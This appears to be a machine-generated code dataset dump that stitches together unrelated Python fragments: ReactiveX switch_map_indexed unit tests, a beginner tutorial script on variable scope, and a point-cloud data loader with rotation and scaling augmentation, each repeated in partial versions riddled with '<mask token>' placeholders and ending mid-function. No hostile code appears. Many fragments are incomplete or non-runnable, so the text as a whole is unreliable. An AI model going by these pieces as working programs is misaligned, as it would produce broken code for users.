---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-2": "<mask token>\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-3": "<mask token>\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-4": "import unittest\nfrom reactivex import interval\nfrom reactivex import operators as ops\nfrom reactivex.testing import ReactiveTest, TestScheduler\nfrom reactivex.testing.marbles import marbles_testing\nfrom reactivex.testing.subscription import Subscription\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-5": "import unittest\n\nfrom reactivex import interval\nfrom reactivex import operators as ops\nfrom reactivex.testing import ReactiveTest, TestScheduler\nfrom reactivex.testing.marbles import marbles_testing\nfrom reactivex.testing.subscription import Subscription\n\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(\n on_next(300, \"a\"),\n on_next(400, \"b\"),\n on_next(500, \"c\"),\n )\n\n def create_inner(x: str, i: int):\n def create_changing(j: int):\n return (i, j, x)\n\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n\n results = scheduler.start(create, disposed=580)\n # (i, j, x): i is the index of the outer emit;\n # j is the value of the inner interval;\n # x is the value of the outer emission\n assert results.messages == [\n on_next(320, (0, 0, \"a\")),\n on_next(340, (0, 1, \"a\")),\n on_next(360, (0, 2, \"a\")),\n on_next(380, (0, 3, \"a\")),\n on_next(420, (1, 0, \"b\")),\n on_next(440, (1, 1, \"b\")),\n on_next(460, (1, 2, \"b\")),\n on_next(480, (1, 3, \"b\")),\n on_next(520, (2, 0, \"c\")),\n on_next(540, (2, 1, \"c\")),\n on_next(560, (2, 2, \"c\")),\n ]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = \"ex\"\n scheduler = TestScheduler()\n sources = [\n scheduler.create_cold_observable(on_next(100, \"a\"), on_next(300, \"aa\")),\n scheduler.create_cold_observable(on_next(50, \"b\"), on_error(120, ex)),\n scheduler.create_cold_observable(\n on_next(50, \"wont happen\"), on_error(120, \"no\")\n ),\n ]\n xs = scheduler.create_hot_observable(\n on_next(\n 250,\n 0,\n ),\n on_next(400, 1),\n on_next(\n 550,\n 2,\n ),\n )\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(350, \"a\"),\n on_next(450, \"b\"),\n on_error(520, ex),\n ]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = \"ABC\"\n scheduler = TestScheduler()\n sources = [\n scheduler.create_cold_observable(on_next(100, \"a\"), on_next(300, \"aa\")),\n scheduler.create_cold_observable(on_next(50, \"b\"), on_error(120, ex)),\n scheduler.create_cold_observable(\n on_next(50, \"wont happen\"), on_error(120, \"no\")\n ),\n ]\n xs = scheduler.create_hot_observable(\n on_next(\n 250,\n 0,\n ),\n on_next(400, 1),\n on_error(430, ex),\n )\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(350, \"a\"),\n on_error(430, ex),\n ]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n # Fake inner which should never be subscribed to\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(\n on_next(300, \"d\"),\n on_next(330, \"f\"),\n on_completed(540),\n )\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(320, (0, 0, \"d\")),\n on_next(350, (1, 0, \"f\")),\n on_next(\n 370, (1, 1, \"f\")\n ), # here the current inner is unsubscribed but not the outer\n on_completed(540), # only outer completion affects\n ]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(\n \" ---a---b------c-----\",\n {\n \"a\": cold(\" --1--2\", None, None),\n \"b\": cold(\" --1-2-3-4-5|\", None, None),\n \"c\": cold(\" --1--2\", None, None),\n },\n None,\n )\n expected = exp(\" -----1---1-2-3--1--2\", None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
'''
# VariableScope.py
#
# Written by leezhm on 13th March, 2012.
#
# Copyright (C) leezhm(c)126.com. All Right Reserved.
#
# For Chapter 6 Dragon Realm
#
# <<Invent Your Own Computer Games with Python>>
'''
print('Why not ?')
print(True and not False)
# A global variable named "spam"
spam = 1208
# This block doesn't run until funky() is called.
def funky() :
# We read the global variable's value:
# print(spam)
# We create a local variable named "spam"
# instead of changing the value of the global variable "spam"
spam = 302
# The name "spam" now refers to the local variable only
# for the rest of this function:
print(spam)
# Call the function funky():
funky()
# The global variable was not changed in funky():
print(spam)
# Function with parameters
def sayHello(name) :
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName) :
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName)
|
normal
|
{
"blob_id": "6af5faaaa9d894dd2b882cfe1bb8b8225780743c",
"index": 630,
"step-1": "<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\n<mask token>\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\n<mask token>\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\n<mask token>\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint('Why not ?')\nprint(True and not False)\n<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\nfunky()\nprint(spam)\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\nprint('Say hello to Alice.')\n<mask token>\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\nsayHello('Lee')\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\n<mask token>\nspam(myName)\nprint('Howdy, ' + myName)\n",
"step-4": "<mask token>\nprint('Why not ?')\nprint(True and not False)\nspam = 1208\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\nfunky()\nprint(spam)\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\nprint('Say hello to Alice.')\nfizzy = 'Alice'\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\nsayHello('Lee')\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\nmyName = 'Albert'\nspam(myName)\nprint('Howdy, ' + myName)\n",
"step-5": "'''\n# VariableScope.py\n#\n# Written by leezhm on 13th March, 2012.\n#\n# Copyright (C) leezhm(c)126.com. All Right Reserved.\n#\n# For Chapter 6 Dragon Realm\n#\n# <<Invent Your Own Computer Games with Python>>\n'''\n\nprint('Why not ?')\n\nprint(True and not False)\n\n# A global variable named \"spam\"\nspam = 1208\n\n# This block doesn't run until funky() is called.\ndef funky() :\n # We read the global variable's value:\n # print(spam)\n\n # We create a local variable named \"spam\"\n # instead of changing the value of the global variable \"spam\"\n spam = 302\n\n # The name \"spam\" now refers to the local variable only\n # for the rest of this function:\n print(spam)\n\n# Call the function funky():\nfunky()\n\n# The global variable was not changed in funky():\nprint(spam)\n\n# Function with parameters\ndef sayHello(name) :\n print('Hello, ' + name)\n\nprint('Say hello to Alice.')\nfizzy = 'Alice'\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\n\nsayHello('Lee')\n\ndef spam(myName) :\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\nmyName = 'Albert'\nspam(myName)\nprint('Howdy, ' + myName)",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ModelFetcher(object):
<|reserved_special_token_0|>
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
<|reserved_special_token_0|>
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
import numpy as np
import h5py
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
def standardize(x):
clipper = np.mean(np.abs(x), (1, 2), keepdims=True)
z = np.clip(x, -100 * clipper, 100 * clipper)
mean = np.mean(z, (1, 2), keepdims=True)
std = np.std(z, (1, 2), keepdims=True)
return (z - mean) / std
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
import numpy as np
import h5py
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
